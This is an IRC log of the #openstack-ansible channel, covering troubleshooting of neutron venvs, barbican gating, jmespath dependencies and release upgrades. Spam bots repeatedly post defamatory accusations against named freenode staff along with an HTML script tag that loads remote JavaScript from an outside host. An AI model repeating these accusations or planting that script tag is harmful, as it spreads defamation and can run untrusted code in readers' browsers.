*** Bhujay has quit IRC11:11
openstackgerritMerged openstack/openstack-ansible-os_cinder master: Fix usage of "|" for tests  https://review.openstack.org/58224611:11
*** Bhujay has joined #openstack-ansible11:11
*** acronix9 has joined #openstack-ansible11:13
*** foddo12 has joined #openstack-ansible11:13
acronix9Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/11:13
*** acronix9 has quit IRC11:13
foddo12Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/11:13
*** cshen has quit IRC11:13
foddo12or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/11:13
foddo12Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate11:13
foddo12<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>11:13
foddo12This message was brought to you by Private Internet Access11:13
*** shardy is now known as shardy_lunch11:13
*** foddo12 has quit IRC11:14
openstackgerritJean-Philippe Evrard proposed openstack/openstack-ansible master: Freeze OpenStack-Ansible roles for Milestone 3  https://review.openstack.org/58572011:17
evrardjpHey, I thought you guys might be interested in this blog by myself about how I hate spammers on IRC11:18
evrardjpBOOM kicked.11:18
*** shyamb has quit IRC11:21
*** udesale__ has quit IRC11:25
*** Bhujay has quit IRC11:27
*** cshen has joined #openstack-ansible11:27
*** Bhujay has joined #openstack-ansible11:27
*** Bhujay has quit IRC11:33
noonedeadpunkHow can I fully reinstall neutron on 1 management node, as it's running not in the container?11:33
noonedeadpunkrunning os-neutron-install.yml does not re-create neither venv nor config files11:36
noonedeadpunk* oops, config files are here...11:36
*** speedmann has quit IRC11:38
TahvokWhat does a freeze mean?11:38
*** Bhujay has joined #openstack-ansible11:38
TahvokI mean what cases would still be merged, and what wouldn't?11:39
*** cshen has quit IRC11:41
*** speedmann has joined #openstack-ansible11:43
*** justJanne13 has joined #openstack-ansible11:43
justJanne13Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/11:43
justJanne13or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/11:43
justJanne13Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate11:43
justJanne13<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>11:43
justJanne13This message was brought to you by Private Internet Access11:43
*** cshen has joined #openstack-ansible11:44
*** EvanR13 has joined #openstack-ansible11:44
EvanR13Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/11:44
EvanR13or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/11:44
*** justJanne13 has quit IRC11:44
EvanR13Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate11:44
EvanR13<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>11:44
EvanR13This message was brought to you by Private Internet Access11:44
*** EvanR13 has quit IRC11:44
*** shyamb has joined #openstack-ansible11:46
noonedeadpunkevrardjp could you please advice how to trigger venv creation for neutron role? It's not an urgent question, as I've already managed to restore venv by syncing it from another server, but still...11:49
*** shyamb has quit IRC12:00
*** shyamb has joined #openstack-ansible12:00
*** Bhujay has quit IRC12:00
*** armaan has quit IRC12:03
*** armaan has joined #openstack-ansible12:04
*** armaan has quit IRC12:07
*** armaan has joined #openstack-ansible12:08
*** shardy_lunch is now known as shardy12:10
*** armaan has quit IRC12:11
*** armaan has joined #openstack-ansible12:12
*** hamzy has quit IRC12:14
evrardjp[m]you can force rebuild12:14
evrardjp[m]check the repo-build play and role.12:15
*** shardy has quit IRC12:16
*** jamesde__ has joined #openstack-ansible12:16
*** hamzy has joined #openstack-ansible12:19
*** jamesden_ has quit IRC12:19
*** shardy has joined #openstack-ansible12:20
noonedeadpunkevrardjp[m] so to get venv installed again on mgmt server I need to run repo-build? It seems, that venv is present there, but it's just not downloaded and unpacked... Ok, I'll try to investigate it.12:21
evrardjpnot so sure what you're asking12:22
evrardjprepo server(s) are storing the data12:23
evrardjpif you want to simplify your life, you can have only one repo server and always rebuild it12:23
*** armaan has quit IRC12:27
*** armaan has joined #openstack-ansible12:27
odyssey4meevrardjp: happy with https://review.openstack.org/583393 ?12:29
noonedeadpunkevrardjp: I couldn't get venv to be downloaded to mgmt server, where nutron-linuxbridge-aget, l2-agent, etc are placed.12:30
openstackgerritChristian Zunker proposed openstack/openstack-ansible master: How to configure Telemetry for radosgw  https://review.openstack.org/58606312:30
noonedeadpunkI've tried to fully remove /openstack/venv dir, but it hasn't been re-created by os_neutron role12:30
openstackgerritChristian Zunker proposed openstack/openstack-ansible master: How to configure Telemetry for radosgw  https://review.openstack.org/58606312:31
*** armaan has quit IRC12:35
evrardjpnoonedeadpunk: there is a cache on the servers12:35
*** armaan has joined #openstack-ansible12:36
evrardjp/var/cache/ ...12:36
evrardjp.tgz12:36
evrardjpif the file is the same, it doesn't get redownloaded12:36
noonedeadpunkevrardjp: got it. thanks.12:36
*** openstackgerrit has quit IRC12:36
evrardjpodyssey4me: thanks for the patch!12:39
odyssey4meevrardjp: thanks for the review!12:45
*** armaan has quit IRC12:46
*** ansmith has joined #openstack-ansible12:46
*** armaan has joined #openstack-ansible12:46
*** armaan has quit IRC13:00
guilhermespmorning! odyssey4me I think you just saw the discussion at cloudalchemy channel about the grafana's database creation. If you don't, just to summarize, the role doens't creates the database for the service as our roles does. And they don't think is the scope of the grafana's role13:03
odyssey4meguilhermesp: yep, I tend to agree13:03
guilhermespyes makes sense13:04
guilhermespdo you think is a good idea to move this task to monasca's role?13:04
odyssey4meI kinda wish we'd done the same, and perhaps we should some day - but we'd have to agree how we'd prefer to do it.13:04
odyssey4meguilhermesp: either the role, or the play, yes13:04
*** shyamb has quit IRC13:05
guilhermespk, gonna see the best way to do it, will be included in a patch to configure grafana soon13:05
*** shyamb has joined #openstack-ansible13:05
ansmithodyssey4me: hello, thanks for all the updates, you have been busy :)13:05
*** armaan has joined #openstack-ansible13:05
*** cshen has quit IRC13:05
odyssey4meansmith: no problem, sorry for barging in on those patches but we noticed something that is better taken care of before those merge13:06
ansmithodyssey4me: makes total sense, when you have a moment, can I get your help on something?13:06
odyssey4meI'll probably do a scripted bunch of patches of the same thing to any that have already merged a bit later today.13:07
odyssey4meansmith: a little tied up right now, but perhaps in 4 hours or so after my work day13:07
odyssey4meunless you think it's a quick look, which is possible13:07
*** cshen has joined #openstack-ansible13:07
ansmithodyssey4me: no worries, let's connect later, works better for me too13:08
*** armaan has quit IRC13:08
*** savvas has joined #openstack-ansible13:09
TahvokDoes anyone have an ansible for openstack ansible deployment host installation?13:16
*** shardy has quit IRC13:18
*** shardy has joined #openstack-ansible13:20
*** jwitko has joined #openstack-ansible13:32
*** jwitko has quit IRC13:33
*** jwitko has joined #openstack-ansible13:34
jrosserexit13:35
jrosserhrm13:35
*** Bhujay has joined #openstack-ansible13:47
*** Bhujay has quit IRC13:47
odyssey4mehmm, seems like gerritbot is missing13:49
odyssey4melol, looks like it got killed for spamming :p13:50
odyssey4meevrardjp hwoarang found a bug, duplicate vars_files: https://review.openstack.org/58622613:51
*** tux_ has joined #openstack-ansible13:51
evrardjpgood catch13:52
evrardjpodyssey4me: yeah gerritbot has been considered as spam13:52
evrardjpcheck in #infra13:53
*** armaan has joined #openstack-ansible14:09
*** jwitko has quit IRC14:09
*** jwitko has joined #openstack-ansible14:10
*** tux__ has joined #openstack-ansible14:11
*** shyamb has quit IRC14:11
*** tux_ has quit IRC14:14
*** armaan has quit IRC14:20
*** lukaslemes has quit IRC14:20
*** throwsb1 has joined #openstack-ansible14:38
*** devx has quit IRC14:42
*** tailDASHeF has quit IRC14:42
*** devx has joined #openstack-ansible14:43
*** LuK133721 has joined #openstack-ansible14:44
LuK133721Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/14:44
LuK133721or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/14:44
LuK133721Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate14:44
LuK133721<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>14:44
LuK133721This message was brought to you by Private Internet Access14:44
*** LuK133721 has quit IRC14:45
*** cshen has quit IRC14:45
*** lvdombrkr has joined #openstack-ansible14:48
*** tux__ has quit IRC14:50
*** tux_ has joined #openstack-ansible14:51
*** FrankZhang has joined #openstack-ansible14:59
FrankZhangevrardjp hey man, you're around? Mind taking a look at the barbican gating? Still failed at repo container but no idea why: https://review.openstack.org/#/c/579284/615:02
adcpdkHi Everyone, I gave up upgrading pike to queens and decided to purge the installation of Pike and install Queens instead, as it's my test environment anyway.15:03
evrardjpFrankZhang: hey15:03
odyssey4meFrankZhang: looks like for some reason barbican has dragonflow as a requirement: http://logs.openstack.org/84/579284/6/experimental/openstack-ansible-deploy-barbican-ubuntu-xenial/95adc1e/logs/openstack/aio1_repo_container-6656a596/repo/wheel_build.log15:04
adcpdkcould anyone possible tell me if it's fine to run the playbooks if the following syntax-check gives that many warnings on the clean system?15:04
adcpdkhttps://paste.ubuntu.com/p/xRv6MBHZJq/15:04
odyssey4meFrankZhang: hmm, no it doesn't - wtf15:05
adcpdkI have just cloned it from the repo15:05
adcpdkwith this command: sudo git clone -b master https://github.com/openstack/openstack-ansible.git /opt/openstack-ansible15:05
d34dh0r53it looks like neutron may want dragonflow?15:05
*** tux_ has quit IRC15:05
evrardjpFrankZhang: odyssey4me that's not the issue15:07
evrardjpd34dh0r53: ^15:07
evrardjpThat's a successfull wheel build: http://logs.openstack.org/68/580368/5/check/openstack-ansible-deploy-aio_lxc-ubuntu-xenial/d1ed43e/logs/openstack/aio1_repo_container-f41c70c8/repo/wheel_build.log15:07
odyssey4meyeah, not neutron... dragonflow won't be there unless neutron is though15:07
evrardjpsame version of dragonflow15:07
evrardjpdragonflow is needed if neutron_all (which I suppose is the case)15:08
evrardjpThe question is whether you run all the plays appropriately, and have the proper groups defined in inventory.15:08
odyssey4meyes, but the barnican test doesn't have neutron: https://review.openstack.org/#/c/579284/6/tests/vars/bootstrap-aio-vars.yml15:08
d34dh0r53and diskimagebuilder is failing http://logs.openstack.org/84/579284/6/experimental/openstack-ansible-deploy-octavia-ubuntu-xenial/44e6356/logs/ara-report/result/2cd57bd2-f811-4abb-821c-066ed1c86466/15:08
evrardjphttps://review.openstack.org/#/c/579284/6/tests/vars/bootstrap-aio-vars.yml15:08
odyssey4meso either we're leaking neutron somewhere or barbican is bad15:09
evrardjpI think it doesn't make sense to have barbican without neutron15:09
evrardjpbut we are probably leaking it indeed.15:09
d34dh0r53yep15:09
*** gillesMo has joined #openstack-ansible15:10
FrankZhangI didn't include neutron in the test, is neutron required in barbican role? https://review.openstack.org/#/c/579284/6/tests/vars/bootstrap-aio-vars.yml15:10
odyssey4meno, it shouldn't be - so we have a leak somewhere15:11
odyssey4melooking at the py pkgs output now15:11
odyssey4mehttp://logs.openstack.org/84/579284/6/experimental/openstack-ansible-deploy-barbican-ubuntu-xenial/95adc1e/logs/ara-report/result/98bf4ea5-6828-48e7-918b-e2cc39fe89cc/15:11
adcpdkCan anyone possible have a look at my message above, I am not sure if I can run setup ansible scripts with the warnings specified in pastebin15:11
gillesMoHello ! Is there a "standard" OSA way of removing a service / component ? I have installed designate but want to remove it for the moment. I can destroy the containers but the services and endpoints will remain...15:11
*** tux_ has joined #openstack-ansible15:12
evrardjpFrankZhang: run a new build with your scenario, check the inventory.json15:12
evrardjpodyssey4me: tell us the output of py_pkgs15:12
odyssey4meevrardjp d34dh0r53 FrankZhang I think this is a repo build bug - checking something15:12
evrardjpwith those two details we can now15:13
adcpdkthat warning is for the new deployments:  [WARNING]: Unable to parse /etc/openstack_deploy/inventory.ini as an inventory source15:13
evrardjpodyssey4me: the only way to know is to have both15:13
*** Guest19794 is now known as kklimonda15:13
evrardjpadcpdk: that's not a problem15:13
evrardjpit's just a warning15:13
adcpdkok, thanks evrardjp15:13
evrardjpgillesMo: you can use openstack cli to remove the component15:13
*** kklimonda has quit IRC15:14
*** kklimonda has joined #openstack-ansible15:14
evrardjpodyssey4me: you see something?15:14
FrankZhangevrardjp it's 3rd or 4th re-build already, all same problem with dragonflow, I can trigger another one now.15:14
evrardjpI am not asking for a rebuild, I am asking for the inventory.15:15
evrardjp:p15:15
*** tux_ has quit IRC15:16
odyssey4meyeah, I'm not seeing it - it'd be nice to have a host with this run on it and the same failure that I could poke at15:19
odyssey4meoh wait, I see it15:19
evrardjpodyssey4me: that's why I asked the inventory : p15:19
odyssey4mefor flying in a bucket15:19
evrardjpodyssey4me: link to py-pkgs?15:19
evrardjppretty please :D15:20
odyssey4meI'll push a patch up now15:20
evrardjpelse I focus on my million other things15:20
evrardjpwait15:20
evrardjpthat's not fun!15:20
evrardjp:p15:20
odyssey4meyou'll see whif you look at http://logs.openstack.org/84/579284/6/experimental/openstack-ansible-deploy-barbican-ubuntu-xenial/95adc1e/logs/ara-report/result/98bf4ea5-6828-48e7-918b-e2cc39fe89cc/15:20
odyssey4mead you look at 'project_group' for os_neutron, you'll see that it's "all"15:21
odyssey4meit's supposed to be set in the role vars15:21
evrardjpok15:21
odyssey4meoh and it is - except it seems this is not bein picked up: https://github.com/openstack/openstack-ansible-os_neutron/blob/master/vars/main.yml#L472-L48015:21
odyssey4meevery other role has it in defaults15:22
odyssey4meeg: https://github.com/openstack/openstack-ansible-os_nova/blob/master/defaults/main.yml#L564-L56815:22
odyssey4meso I guess the py_pkgs lookup doesn't read vars files15:22
odyssey4meI'll move it back to defaults, given that's likely the least impact method.15:23
odyssey4med34dh0r53 evrardjp https://review.openstack.org/58626915:25
odyssey4meFrankZhang: once that's merged, 'check experimental' your patch and it should go through15:25
FrankZhangodyssey4me @evrardjp wonderful, thanks for the help15:26
evrardjpodyssey4me: let me check how hard would it be to have it in vars15:27
*** savvas has quit IRC15:27
*** savvas has joined #openstack-ansible15:27
evrardjpwe have specific conditionals for those15:29
evrardjpodyssey4me: it's not the only one to do15:29
evrardjptempest...15:29
evrardjpand others15:29
evrardjpIIRC15:29
*** savvas has quit IRC15:29
jamesdentonQQ - are functional tests logged anywhere?15:29
odyssey4meevrardjp: tempest doesn't have its own group15:29
*** savvas has joined #openstack-ansible15:30
odyssey4meevrardjp: I think it uses the utility container IIRC15:30
evrardjpoh no15:30
evrardjpit seems it works15:30
evrardjpit's the only one15:30
evrardjpjamesdenton: everywhere15:30
evrardjp:)15:30
evrardjpjamesdenton: we have ARA and a full log15:30
odyssey4mejamesdenton: if you click on the result it'll show a list of files/folder - under 'logs' are all our logs and an ARA report15:31
jamesdentonif i'm running them locally15:31
jamesdentonsorry15:31
odyssey4meoh, hmm, ansible's output it a log and all other logs are in the containers... are you talking about tempest results?15:31
evrardjpjamesdenton: /openstack15:31
FrankZhangodyssey4me may I ask how to find py-package in ara? http://logs.openstack.org/84/579284/6/experimental/openstack-ansible-deploy-barbican-ubuntu-xenial/95adc1e/logs/ara-report/15:32
evrardjpthat's the magic bok15:32
odyssey4meyep, always /openstack or /var/log15:32
jamesdentonok cool, i'll dig around. thank you15:32
odyssey4meFrankZhang: search for the task name which uses the plugin: https://github.com/openstack/openstack-ansible/blob/master/playbooks/repo-build.yml#L5615:32
FrankZhangok, cool, thanks!15:33
*** lvdombrkr has quit IRC15:36
*** pcaruana has quit IRC15:38
*** cshen has joined #openstack-ansible15:39
*** hamzy has quit IRC15:41
*** hamzy has joined #openstack-ansible15:41
*** gyee has joined #openstack-ansible15:59
*** tux_ has joined #openstack-ansible15:59
noonedeadpunkdoes anybody know if it's should be enought to specify qos for neutron_plugin_base to get qos working? As I'm able to create qos rules and policies, but thay actually have no effect on assigned ports/networks.16:00
gillesMoevrardjp: sorry for the delay ! Thanks, of course I can delete the service with the CLI, but I wander if somewhere a "service = absent" would have done it for me ;-)16:01
*** savvas has quit IRC16:06
*** cshen has quit IRC16:08
tux_coolj: are you there, just wanted to see if you get back update from storage guy?16:10
*** savvas has joined #openstack-ansible16:14
gillesMoWhen I remove containers with lxc-containers-destroy.yml, how do I update the inventory ?16:15
gillesMoEdit manually openstack_inventory.json ? What about openstack_hostnames_ips.yml ?16:16
*** cshen has joined #openstack-ansible16:16
*** savvas has quit IRC16:18
*** openstackgerrit has joined #openstack-ansible16:20
openstackgerritMerged openstack/openstack-ansible-ops master: Adds Support for MNAIO CentOS 7 Environment  https://review.openstack.org/58535316:20
*** cshen has quit IRC16:21
*** savvas has joined #openstack-ansible16:23
gillesMoI found : delete containers in inventory : inventory-manage.py -r16:24
*** savvas has quit IRC16:28
*** suggestable has quit IRC16:28
*** andymccr_ has joined #openstack-ansible16:29
*** asettle_ has joined #openstack-ansible16:29
*** savvas has joined #openstack-ansible16:32
*** asettle_ has quit IRC16:33
*** andymccr_ has quit IRC16:33
*** andymccr_ has joined #openstack-ansible16:33
*** andymccr_ has quit IRC16:34
*** andymccr_ has joined #openstack-ansible16:34
*** asettle_ has joined #openstack-ansible16:34
*** savvas has quit IRC16:36
*** hachi has quit IRC16:38
*** andymccr_ has quit IRC16:38
*** asettle_ has quit IRC16:38
*** hachi has joined #openstack-ansible16:38
*** andymccr_ has joined #openstack-ansible16:38
*** asettle_ has joined #openstack-ansible16:38
*** asettle_ has quit IRC16:39
*** andymccr_ has quit IRC16:39
*** savvas has joined #openstack-ansible16:41
openstackgerritJacob Wagner proposed openstack/openstack-ansible-ops master: Add ability to deploy Ceph into a Multinode AIO  https://review.openstack.org/58500316:42
openstackgerritJacob Wagner proposed openstack/openstack-ansible-ops master: Add ability to deploy Ceph into a Multinode AIO  https://review.openstack.org/58500316:44
*** andymccr_ has joined #openstack-ansible16:44
*** asettle_ has joined #openstack-ansible16:45
*** Darcidride has joined #openstack-ansible16:46
*** chandankumar is now known as chkumar|trekk16:47
*** suggestable has joined #openstack-ansible16:48
*** savvas has quit IRC16:52
*** savvas has joined #openstack-ansible16:52
*** asettle_ has quit IRC16:53
*** andymccr_ has quit IRC16:53
*** andymccr_ has joined #openstack-ansible16:54
*** asettle_ has joined #openstack-ansible16:54
*** cshen has joined #openstack-ansible16:54
*** asettle_ has quit IRC16:55
*** andymccr_ has quit IRC16:55
*** andymccr_ has joined #openstack-ansible16:55
*** asettle_ has joined #openstack-ansible16:55
*** suggestable has quit IRC16:56
*** shardy has quit IRC17:01
*** gillesMo has quit IRC17:08
*** tux_ has quit IRC17:09
*** cshen has quit IRC17:16
cloudnullgillesMo the openstack_hostnames_ips file is auto generated nothing to change there.17:19
*** tux_ has joined #openstack-ansible17:19
cloudnullif folks have a moment to review https://review.openstack.org/#/c/585524 I'd appreciate it17:20
*** cshen has joined #openstack-ansible17:20
cloudnullits a pattern that, if accepted, I will need to replicate out to all other os_* roles17:21
*** cshen has quit IRC17:27
*** savvas has quit IRC17:41
*** savvas has joined #openstack-ansible17:42
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_zun master: tests: Ensure clouds.yaml is present, and use it  https://review.openstack.org/58614517:43
*** savvas_ has joined #openstack-ansible17:43
*** savvas_ has quit IRC17:43
odyssey4mecloudnull: FYI I've been doing some thing on the zun role to make it work ^17:44
*** savvas_ has joined #openstack-ansible17:44
odyssey4meSo far https://review.openstack.org/#/c/586025/1 and https://review.openstack.org/#/c/586045/1 help it get there17:44
cloudnullawesome !17:44
cloudnulllooks like we still need a zuul config17:46
*** savvas has quit IRC17:46
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_zun master: tests: Ensure clouds.yaml is present, and use it  https://review.openstack.org/58614517:46
odyssey4mejust added that to the same patch now17:46
cloudnullnice!17:47
openstackgerritAndy Smith proposed openstack/openstack-ansible-os_keystone master: Setup oslo.messaging extra packages for optional drivers  https://review.openstack.org/58447917:47
openstackgerritKevin Carter (cloudnull) proposed openstack/openstack-ansible-os_glance master: Convert role to use a common systemd mount role  https://review.openstack.org/55218517:54
*** poopcat has joined #openstack-ansible17:55
noonedeadpunkodyssey4me: I'm already done for today, so could you please comment out https://review.openstack.org/#/c/584629/ or probably we may discuss it tomorrow?17:58
*** hachi has quit IRC18:04
openstackgerritKevin Carter (cloudnull) proposed openstack/openstack-ansible-ops master: Add arcsight ingestion into logstash  https://review.openstack.org/58499718:09
openstackgerritKevin Carter (cloudnull) proposed openstack/openstack-ansible master: Add networkd prefix when creating networks  https://review.openstack.org/57189818:10
odyssey4menoonedeadpunk: yeah, apologies - tomorrow I'll have more attention on OSA, we can chat first thing in the morning18:14
openstackgerritMerged openstack/openstack-ansible-os_zun master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/58577318:15
openstackgerritMerged openstack/openstack-ansible-os_zun master: Add the project source code repository in README  https://review.openstack.org/58483218:15
odyssey4meansmith: I'm a little bushed, but tomorrow have more time available. Are you happy to postpone discussion to then?18:15
noonedeadpunkodyssey4me: I'll be online since 10AM UTC18:16
odyssey4menoonedeadpunk: I'll be online before that. See you then!18:17
openstackgerritMerged openstack/openstack-ansible-os_zun master: Switch compute to use different inventory_hostname  https://review.openstack.org/58602518:17
spotzHey all - anyone have some words of wisdom on this? http://lists.openstack.org/pipermail/openstack-mentoring/2018-July/000002.html18:23
cloudnullodyssey4me evrardjp https://review.openstack.org/#/c/582150 - are we sure the jmespath package is being installed by default ?18:25
cloudnulllooks like they want to upgrade newton to queens using OSA18:28
cloudnullprobably just needs to run the "run-upgrade" script to get the environment to pike then again to go to queens18:29
cloudnullIE https://docs.openstack.org/openstack-ansible/queens/admin/upgrades/major-upgrades.html18:29
odyssey4mecloudnull: it is, although I see now that it's not a direct dep - must be indirect18:31
odyssey4mewe should change that if we're using it18:31
spotzthanks cloudnull:)18:31
cloudnullspotz https://docs.openstack.org/openstack-ansible/pike/user/manual-upgrade.html then https://docs.openstack.org/openstack-ansible/queens/admin/upgrades/major-upgrades.html - I'd probably also point them to the OSA channel18:31
cloudnullspotz do you have a min to reply ?18:32
openstackgerritDmitriy Rabotjagov (noonedeadpunk) proposed openstack/openstack-ansible-os_horizon master: Implements custom theme distribution  https://review.openstack.org/58631818:32
cloudnullodyssey4me totally agree.18:32
odyssey4mecloudnull: I know th eopenstack client brings it in - just checking whether ansible does now18:32
spotzcloudnull:  yep18:33
cloudnullodyssey4me i did a little test playbook18:33
cloudnullhttp://paste.openstack.org/show/726706/18:33
cloudnullhttp://paste.openstack.org/show/726707/18:33
odyssey4mecloudnull: oh, shade is bringing it in18:33
cloudnullthe package was not installed in my local ansible (running 2.5) venv18:34
odyssey4meyep, shade is definitely bringing it in - but yeah, we should add the dep directly so we don't rely on shade to bring it in18:34
evrardjpcloudnull: it shoul18:34
cloudnullit might all work as is, but we should add it as a dep list, like netaddr18:34
evrardjpcloudnull: it should be brought in18:35
cloudnullevrardjp it is not being brought in by ansible18:35
cloudnullat least not in 2.518:35
evrardjpI am trying to remember what brings it in though.18:35
odyssey4mecloudnull: it's coming from https://github.com/openstack/openstack-ansible/blob/master/requirements.txt#L2018:35
odyssey4meand https://github.com/openstack/openstack-ansible-tests/blob/master/test-requirements.txt#L3718:36
odyssey4meCollecting jmespath>=0.9.0 (from openstacksdk>=0.15.0->shade)18:36
cloudnullalso not in 2.6.118:38
cloudnullhttp://paste.openstack.org/show/726708/18:38
cloudnullso i think we're safe for now .18:38
cloudnullgiven its there from other packages18:38
cloudnullhowever it'd be good to list it as an actual requirement18:38
openstackgerritMerged openstack/openstack-ansible-os_zun master: Include common test vars  https://review.openstack.org/58604518:38
evrardjpyeah shade is kinda a metapkg now, so it's openstacksdk doing the thing18:38
evrardjpcloudnull: I don't disagree on the explicit thing.18:39
evrardjpwe'll catch it though18:39
evrardjpyou want to pin it?18:39
evrardjpcloudnull: you had an issue somewhere?18:39
cloudnullid want it added here https://github.com/openstack/openstack-ansible/blob/master/requirements.txt18:40
odyssey4meand here: https://github.com/openstack/openstack-ansible-tests/blob/master/test-requirements.txt18:40
odyssey4me(common test reqs)18:40
cloudnullnot so much an issue but jrosser just added that package to the embedded ansible we're using in the elk_metrics_6x work18:40
odyssey4meyeah, jmespath is awesome18:40
openstackgerritKevin Carter (cloudnull) proposed openstack/openstack-ansible-ops master: Further tune the playbooks, configs, and thread pool  https://review.openstack.org/58556718:43
odyssey4meI'm out for the night. Cheer folks!18:44
cloudnulllater odyssey4me18:45
*** jproulx has joined #openstack-ansible18:45
openstackgerritMerged openstack/openstack-ansible-openstack_hosts master: Do not install linux-image-extra by default  https://review.openstack.org/58537618:47
spotzniht odyssey4me18:48
openstackgerritGuilherme  Steinmuller Pimentel proposed openstack/openstack-ansible-os_monasca master: [WIP] Configure grafana  https://review.openstack.org/58632218:48
jproulxI'm attempting to install OSA mitaka-eol as prelim to upgrading existing cloud.  Existing cloud is 16.04+Mitaka is there a way to get OSA to deploy Mitaka on 16.04? It's giving me:18:49
jproulxmsg: The only supported platform for this release is Ubuntu 14.04 LTS (Trusty)18:49
jproulxduring setup-hosts.yml, guess I could walk it back but would really rather not.18:49
jamesdentonIIRC, Newton was the first to support 16.0418:50
jproulxMore to the point I guess can I get it to skip the check ans see what breaks :)18:52
jamesdentonanything's possible, given enough time :D18:52
jamesdentoni think you'll have a bad time.18:52
cloudnulljproulx what jamesdenton said, newton was the first release we did with 160418:53
jproulxOK fair 'nuf18:53
odyssey4mejproulx: yeah, newton was also when we started using UCA18:53
odyssey4meso to make mitaka work on xenial you'd probably have to work back a ton of UCA things18:54
odyssey4megiven enough time... but argh!18:54
cloudnull^18:54
odyssey4mejproulx: if it's an existing DB installed by something else, then you'd likely be fine just installing with that upgrading to newton18:54
odyssey4meit's plausible that you could prep a greenfield, then wipe the DB, import the old one, then run the newton install and see what happens18:55
odyssey4megreenfield newton I mean18:55
jproulxHmmm, yeah so I need to decide which pain I want (as usual).18:56
odyssey4meyou'd have a better time doing that than trying to retrofit xenial/mitaka18:56
odyssey4meof course, yes, both are painful18:56
*** tosky has quit IRC18:57
jproulxprevious plan was parallel install an OSA Mitaka control plane, cut over to that then use OSA to manage upgrades.18:57
*** mmercer has joined #openstack-ansible18:58
logan-theres almost 0 chance of getting mitaka to work with xenial. you'd have to backport all of the upstart->systemd stuff too heh18:58
odyssey4meoh dear, forgot about that18:59
jproulxIf that means also having and Ubuntu upgrade in the control plane between from Mitaka to Newton, then maybe I do walk my crufty "managment" system through one more creaky upgrade to Newton before joining the OSA party18:59
odyssey4mewell, realistically speaking everything on the control plane depends on the state held in the db19:00
jproulxOh yeah upstart ... it is possible to run Xenial with upstart but probably not worth the pain for all other reasons people have pointed out19:00
odyssey4meI think mnaser did a staged cut-over from another deployment system recently, perhaps he has some war stories to share19:01
*** hamzy has quit IRC19:02
*** hamzy_ has joined #openstack-ansible19:02
jproulxRelated question, does OSA-Newton support 14.04?  Trying to consider what Mitaka->Newton upgrade within OSA looks like, if there's overlap and I go Mitaka->Newton then 14.04 -> 16.04 that's preferable, if It needs to be both at one jump I need to think about it a bit differently...19:09
*** taseer1 has joined #openstack-ansible19:10
*** cshen has joined #openstack-ansible19:10
openstackgerritMerged openstack/openstack-ansible-os_swift master: Remove httplib  https://review.openstack.org/58393319:10
jrossercloudnull: re jmespath i ran out of time but conclueded the same that it ended up installed in the gate almost accidentally so the uses of json_query in osa work uk19:11
jrosserbut are probably going to fail for someone with a clean deploy host19:11
*** Taseer has quit IRC19:12
*** taseer2 has joined #openstack-ansible19:12
odyssey4mejproulx: yes newton is trusty and xenial, we use it as a transition release19:14
*** ianychoi_ has joined #openstack-ansible19:15
*** taseer1 has quit IRC19:15
*** pcaruana has joined #openstack-ansible19:17
*** ianychoi has quit IRC19:18
jproulxgood answer thanks :)19:18
evrardjpI am out for today19:20
evrardjpWe have missed the m3 deadlines due to gating -- I am rechecking the damn patch for a day now19:20
evrardjpbut releases is informed19:20
evrardjpwe'll do our best.19:20
evrardjpon that point, talk to you all later!19:20
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-tests master: Add jmespath to test-requirements.txt  https://review.openstack.org/58633019:22
odyssey4meevrardjp cloudnull ^19:23
evrardjpodyssey4me: haha deserves to be president19:23
evrardjpI am not sure if it's a typo or not19:23
evrardjpbut I am definitely +2ing as it is now.19:24
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible master: Add jmespath to test-requirements.txt  https://review.openstack.org/58633119:24
evrardjptopic title proves it's not a typo19:24
odyssey4meevrardjp cloudnull ^19:24
odyssey4methe partner19:24
odyssey4me(in crime)19:24
odyssey4meoh bah, bad title19:24
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible master: Add jmespath to requirements.txt  https://review.openstack.org/58633119:25
odyssey4mefixed up, shipit!19:25
evrardjpI like jmespath for a while too, I am sad I didn't show you all that LONG ago.19:25
evrardjpI want to be partner in crime!19:27
evrardjp:p19:27
evrardjp(for jmespath)19:27
* odyssey4me will sleep better at night with jmespath as prez19:28
*** FrankZhang has quit IRC19:29
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_zun master: tests: Ensure clouds.yaml is present, and use it  https://review.openstack.org/58614519:29
ansmithodyssey4me: apologize I missed you earlier, tomorrow is wide open for me so catch you then19:41
*** pcaruana has quit IRC19:45
cloudnullanyone around mind giving https://review.openstack.org/#/c/552185/ a nudge19:49
openstackgerritMerged openstack/openstack-ansible stable/queens: Update all SHAs for 17.0.8  https://review.openstack.org/58479619:50
odyssey4mecloudnull: really, really, really need to make sure that doesn't break te integrated build given the M3 milestone19:51
logan-good point19:51
cloudnullodyssey4me we're not testing nfs in the integrated build so I'd assume it'd be ok19:52
